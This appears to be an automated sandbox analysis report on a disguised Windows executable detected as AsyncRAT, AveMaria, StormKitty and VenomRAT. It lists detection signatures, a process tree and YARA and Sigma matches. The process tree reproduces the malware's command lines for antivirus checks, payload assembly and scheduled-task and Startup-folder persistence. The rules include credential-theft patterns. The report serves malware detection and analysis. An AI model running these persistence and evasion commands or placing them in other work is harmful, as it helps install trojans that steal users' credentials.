Edit tour

Windows Analysis Report
nj230708full.pdf.scr.exe

Overview

General Information

Sample name:	nj230708full.pdf.scr.exe
Analysis ID:	1555331
MD5:	e8285f01dff90fca4b37d4df7da03c4b
SHA1:	fb19156b1aab033ed8b5212821a8b039a2c363d9
SHA256:	edc325712bb62fcd4fe96f6bf63559449b9158b816768a8122dad070e8aaf44e
Tags:	exeHUNuser-smica83
Infos:

Detection

AsyncRAT, AveMaria, StormKitty, VenomRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Sigma detected: Drops script at startup location

Sigma detected: Search for Antivirus process

Yara detected AntiVM3

Yara detected AsyncRAT

Yara detected AveMaria stealer

Yara detected BrowserPasswordDump

Yara detected Powershell download and execute

Yara detected StormKitty Stealer

Yara detected VenomRAT

.NET source code references suspicious native API functions

AI detected suspicious sample

Drops PE files with a suspicious file extension

Found API chain indicative of sandbox detection

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses an obfuscated file name to hide its real file extension (double extension)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes many files with high entropy

Writes to foreign memory regions

Wscript called in batch mode (surpress errors)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: SCR File Write Event

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Suspicious Screensaver Binary File Creation

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

nj230708full.pdf.scr.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\nj230708full.pdf.scr.exe" MD5: E8285F01DFF90FCA4B37D4DF7DA03C4B)

cmd.exe (PID: 7480 cmdline: "C:\Windows\System32\cmd.exe" /c copy Swing Swing.cmd & Swing.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7540 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7548 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

tasklist.exe (PID: 7584 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)

findstr.exe (PID: 7592 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7636 cmdline: cmd /c md 186040 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

findstr.exe (PID: 7652 cmdline: findstr /V "toolkitczechhappenwestminster" Texture MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

cmd.exe (PID: 7668 cmdline: cmd /c copy /b ..\Junk + ..\Screenshot + ..\Colombia + ..\Escorts + ..\Waiver + ..\Aboriginal + ..\Wherever + ..\Higher + ..\Amazon + ..\Releases + ..\Dame + ..\Economic + ..\Innovations + ..\Sampling + ..\Nuke + ..\Fellowship + ..\Brain + ..\Eat + ..\Shopping + ..\Constitution + ..\Planes + ..\Railroad + ..\Enhancing + ..\Locator + ..\Occasion + ..\Pay + ..\Cinema L MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

Tracks.pif (PID: 7684 cmdline: Tracks.pif L MD5: 78BA0653A340BAC5FF152B21A83626CC)

cmd.exe (PID: 7732 cmdline: cmd /c schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7784 cmdline: schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7800 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & echo URL="C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EchoCraft.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 5812 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cmd.exe (PID: 4080 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7556 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 7200 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8CF.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 7548 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

winservices.exe (PID: 7636 cmdline: "C:\Users\user\AppData\Roaming\winservices.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 7660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7484 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cmd.exe (PID: 4500 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4460 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)

cmd.exe (PID: 3732 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpBB7A.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5232 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

winservices.exe (PID: 7956 cmdline: "C:\Users\user\AppData\Roaming\winservices.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 3096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

choice.exe (PID: 7716 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)

wscript.exe (PID: 7808 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EchoCraft.scr (PID: 7900 cmdline: "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K" MD5: 78BA0653A340BAC5FF152B21A83626CC)

wscript.exe (PID: 8104 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)

EchoCraft.scr (PID: 8160 cmdline: "C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.scr" "C:\Users\user\AppData\Local\EchoArtisan Technologies\K" MD5: 78BA0653A340BAC5FF152B21A83626CC)

winservices.exe (PID: 7232 cmdline: C:\Users\user\AppData\Roaming\winservices.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

conhost.exe (PID: 4412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
AsyncRAT	AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/asyncrat-onenote-dropper https://aidenmitchell.ca/asyncrat-via-vbs/ https://assets.virustotal.com/reports/2021trends.pdf https://axmahr.github.io/posts/asyncrat-detection/ https://blog.checkpoint.com/research/november-2023s-most-wanted-malware-new-asyncrat-campaign-discovered-while-fakeupdates-re-entered-the-top-ten-after-brief-hiatus/	https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name	Description	Attribution	Blogpost URLs	Link
Ave Maria, AveMariaRAT, avemaria	Information stealer which uses AutoIT for wrapping.	Anunak	http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery https://asec.ahnlab.com/en/36629/ https://blog.cyber5w.com/analyzing-macro-enabled-office-documents https://blog.morphisec.com/syk-crypter-discord https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name	Description	Attribution	Blogpost URLs	Link
Cameleon, StormKitty	PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.	No Attribution	https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x1b5b6b:$a1: havecamera 0x1f4810:$a2: timeout 3 > NUL 0x1f6b03:$a3: START "" " 0x1f8d10:$a3: START "" " 0x1f8bfd:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x1f8c88:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1ee11e:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
00000018.00000002.2132702456.0000000000D02000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1eab32:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x1e7861:$s6: VirtualBox 0x1f2904:$s6: VirtualBox 0x1edaca:$s8: Win32_ComputerSystem 0x1f286a:$s8: Win32_ComputerSystem 0x1f94d8:$s9: Win32_Process Where ParentProcessID= 0x1f90eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f9188:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f929d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1f9385:$cnc4: POST / HTTP/1.1
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_VenomRAT	Yara detected VenomRAT	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 5812	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0xc74f4:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
Process Memory Space: MSBuild.exe PID: 5812	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x885e0:$s6: VirtualBox 0xc71ca:$s8: Win32_ComputerSystem 0xc97ec:$s8: Win32_ComputerSystem 0xcc49d:$s9: Win32_Process Where ParentProcessID= 0xcc2aa:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xcc2f8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xcc382:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xcc3f6:$cnc4: POST / HTTP/1.1
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
24.2.MSBuild.exe.d00000.1.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
24.2.MSBuild.exe.d00000.1.unpack	JoeSecurity_StormKitty	Yara detected StormKitty Stealer	Joe Security
24.2.MSBuild.exe.d00000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.MSBuild.exe.d00000.1.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
24.2.MSBuild.exe.d00000.1.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0x1b5d6b:$a1: havecamera 0x1f4a10:$a2: timeout 3 > NUL 0x1f6d03:$a3: START "" " 0x1f8f10:$a3: START "" " 0x1f8dfd:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x1f8e88:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
24.2.MSBuild.exe.d00000.1.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x1f8e88:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x1f8dfd:$s2: L2Mgc2NodGFza3MgL2
24.2.MSBuild.exe.d00000.1.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x1f6f47:$q1: Select * from Win32_CacheMemory 0x1f6f87:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x1f6fd5:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x1f7023:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
24.2.MSBuild.exe.d00000.1.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x1ee31e:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
24.2.MSBuild.exe.d00000.1.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x1f45c6:$s1: \VPN\NordVPN 0x1f45ac:$s2: \VPN\OpenVPN 0x1f458e:$s3: \VPN\ProtonVPN
24.2.MSBuild.exe.d00000.1.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x1f7c23:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1f7c95:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1f7d1f:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1f7db1:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1f7e1b:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1f7e8d:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1f7f23:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1f7fb3:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
24.2.MSBuild.exe.d00000.1.unpack	MALWARE_Win_StormKitty	Detects StormKitty infostealer	ditekSHen	0x5c8:$x2: https://github.com/LimerBoy/StormKitty 0x5e4:$x3: StormKitty 0x1e12fb:$s2: GetAntivirus 0x1eeb70:$s4: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$ 0x1f0e56:$s5: BCrypt.BCryptGetProperty() (get size) failed with status code:{0} 0x1f1132:$s6: "encrypted_key":"(.*?)"
24.2.MSBuild.exe.d00000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1ead32:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0x1e7a61:$s6: VirtualBox 0x1f2b04:$s6: VirtualBox 0x1edcca:$s8: Win32_ComputerSystem 0x1f2a6a:$s8: Win32_ComputerSystem 0x1f96d8:$s9: Win32_Process Where ParentProcessID= 0x1f92eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1f9388:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1f949d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1f9585:$cnc4: POST / HTTP/1.1
24.2.MSBuild.exe.de9f06.0.raw.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
24.2.MSBuild.exe.de9f06.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
24.2.MSBuild.exe.de9f06.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
24.2.MSBuild.exe.de9f06.0.raw.unpack	JoeSecurity_BrowserPasswordDump_1	Yara detected BrowserPasswordDump	Joe Security
24.2.MSBuild.exe.de9f06.0.raw.unpack	Windows_Trojan_DCRat_1aeea1ac	unknown	unknown	0xcdc65:$a1: havecamera 0x10c90a:$a2: timeout 3 > NUL 0x10ebfd:$a3: START "" " 0x110e0a:$a3: START "" " 0x110cf7:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g 0x110d82:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==
24.2.MSBuild.exe.de9f06.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_B64_Artifacts	Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.	ditekSHen	0x110d82:$s1: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA 0x110cf7:$s2: L2Mgc2NodGFza3MgL2
24.2.MSBuild.exe.de9f06.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice	Detects executables attemping to enumerate video devices using WMI	ditekSHen	0x10ee41:$q1: Select * from Win32_CacheMemory 0x10ee81:$d1: {860BB310-5D01-11d0-BD3B-00A0C911CE86} 0x10eecf:$d2: {62BE5D10-60EB-11d0-BD3B-00A0C911CE86} 0x10ef1d:$d3: {55272A00-42CB-11CE-8135-00AA004BB851}
24.2.MSBuild.exe.de9f06.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Discord_Regex	Detects executables referencing Discord tokens regular expressions	ditekSHen	0x106218:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}\|mfa\.[a-zA-Z0-9_\-]{84}
24.2.MSBuild.exe.de9f06.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_References_VPN	Detects executables referencing many VPN software clients. Observed in infosteslers	ditekSHen	0x10c4c0:$s1: \VPN\NordVPN 0x10c4a6:$s2: \VPN\OpenVPN 0x10c488:$s3: \VPN\ProtonVPN
24.2.MSBuild.exe.de9f06.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x10fb1d:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x10fb8f:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x10fc19:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x10fcab:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x10fd15:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x10fd87:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x10fe1d:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x10fead:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
24.2.MSBuild.exe.de9f06.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x102c2c:$s3: {{ ProcessId = {0}, Name = {1}, ExecutablePath = {2} }} 0xff95b:$s6: VirtualBox 0x10a9fe:$s6: VirtualBox 0x105bc4:$s8: Win32_ComputerSystem 0x10a964:$s8: Win32_ComputerSystem 0x1115d2:$s9: Win32_Process Where ParentProcessID= 0x1111e5:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x111282:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x111397:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x11147f:$cnc4: POST / HTTP/1.1
Click to see the 18 entries

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 5812, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "winservices" /tr '"C:\Users\user\AppData\Roaming\winservices.exe"' & exit, ProcessId: 4080, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Command Patterns In Scheduled Task Creation

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7732, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Involvement" /tr "wscript //B 'C:\Users\user\AppData\Local\EchoArtisan Technologies\EchoCraft.js'" /sc minute /mo 5 /F, ProcessId: 7784, ProcessName: schtasks.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

